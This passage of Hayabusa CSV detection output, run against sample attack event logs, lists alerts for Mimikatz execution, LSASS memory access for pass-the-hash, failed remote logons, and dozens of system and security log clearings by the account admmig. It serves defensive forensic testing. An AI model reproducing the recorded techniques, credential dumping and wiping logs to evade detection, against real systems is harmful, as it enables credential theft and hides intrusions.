+09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: mimikatz.exe : Path: C:\TOOLS\Mimikatzx64\mimikatz.exe : User: OFFSEC\admmig : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: mimikatz.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Mimikatz Detection LSASS 
Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx +2021-10-22 22:39:49.619 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx +2021-10-22 23:02:11.218 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx +2021-10-22 23:02:15.177 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx 
+2021-10-24 06:50:11.666 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: - : Type: 10 : Workstation: - : IP Address: 10.23.23.9 : SubStatus: 0x0 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx +2021-10-24 06:51:57.212 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: - : Type: 10 : Workstation: - : IP Address: 10.23.23.9 : SubStatus: 0x0 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx +2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:09:51.875 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.002 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.080 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.095 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.127 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.142 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.215 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.293 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.340 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.355 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.418 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.480 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.527 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.574 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.591 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.606 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.638 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.653 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.669 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.888 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.903 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.950 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:09.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.044 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.138 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.231 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.263 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.294 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.309 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.325 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.341 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.356 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.419 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.434 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.497 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.528 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.763 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.809 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.934 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.997 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.091 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 